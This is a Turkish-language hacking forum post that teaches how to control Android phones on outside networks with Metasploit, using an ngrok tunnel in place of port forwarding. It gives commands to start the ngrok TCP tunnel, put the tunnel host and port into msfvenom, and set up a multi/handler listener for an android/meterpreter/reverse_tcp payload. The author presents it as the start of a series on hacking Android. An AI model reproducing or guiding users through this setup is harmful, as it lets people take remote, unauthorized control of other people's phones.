İPUCU

Linux Linux İle İlgili Bilgi Paylaşım Platformu

Seçenekler

port acmadan ve ip sabitlemeden mettasploit ile dıs ağ hack

cewl - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2017
Nereden:
Merdekan
Yaş:
24
Mesajlar:
2.768
Konular:
178
Teşekkür (Etti):
0
Teşekkür (Aldı):
756
Ticaret:
(0) %
05-08-2019 17:47
#1
port acmadan ve ip sabitlemeden mettasploit ile dıs ağ hack
Merhaba arkadaslar bu gun is sizler icin port acmadan ip ni deyismez etmeden nasil 1 payload olusdurulur ve mettasploite nasil parametreleri giriler msfvenomda nasil parametreleri giriler onu gostermeye calisacaqim arkadaslar bunun icin ise bize gerekli olan bi arac indireceyiz kali linuksmuzua ismi ise ngrok dur unu kendi sitesinden indire bilirsiniz

Kod:
  https://ngrok.com/download

ve siteyi kontrol ettiyinizi dusunuyorm arkadaslar ve siteye girirken sign up diyelimki bize token vere bilsin ben g mail ile giris yapdim ve ngroku indirdim ardiycan ise asagidaki resimde gozukduyu gibi terminala bu parametreni yazdim


ve sitede 3 yazlan kisimda bize tokenmizi verdi parametreni alip ngrokun bulunduqu kismda terminala yazalim ve unutmayalimki ngroku zipden cikarmak lazim unzip yapa bilirsiniz


yukaridaki parametreni gordunuzmu tokenmizi ngroka soyledik oda kaydetti buraya kadar iyi geldik en altta parametrelerin tumun yazacaqim endise etmeyin gelelim bir ngroku baslatalim



Kod:
  ./ngrok tcp 4444


portunu dinlemey aldin ardiycan ise kali linuksda terminal acalim ve altaki resimdeki gibi parametreleri girmeye baslayalim


dikkat arkadasalr ngrokun aclan penceresindeki ((tcp://0.tcp.ngrok.io:10737)) kismindaki < 0.tcp.ngrok.io > balantiyi alip terminalda msfvenomdaki LHOST=(buraya yazyoruz) ardiycn ise LPORT =(kismina ise linkdeki portu yazyoruz mesela lport=10737) tcp://0.tcp.ngrok.io:10737 link bu sizde baska olacakdir ana ekrana ve yahuda baska yere kayd etip cikalim ve mettasploit penceresini acalim



ardiycan ise terminala msfconsole yazalim

Kod:
   msfconsole
yazdikdan sonra ise gereken parametreleri girmeye baslayalm

Kod:
   use multi/handler


Kod:
   set payload android/meterpreter/reverse_tcp



Kod:
   set lhost localhost


Kod:
     set lport 4444


arkadaslar bildiyimiz uzere windows icin -p windows kullaniliyor eyer bu konuyu inceleyen ve uyqulama isdeyen arkadaslar varsa ben oyle sanyormki linuksdan anlayilari vardir windows icin baska parametre android icin baska parametre ben android icin gosterdin cunki bundan sonra gelecek konlarim sirf android hekleme olacakdir

Mod arkadasdanda rica edyorm lutfen konlarmin altina yazlan postlari silme bu gunun sabahida var

Konu cewl tarafından (05-08-2019 17:54 Saat 17:54 ) değiştirilmiştir.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı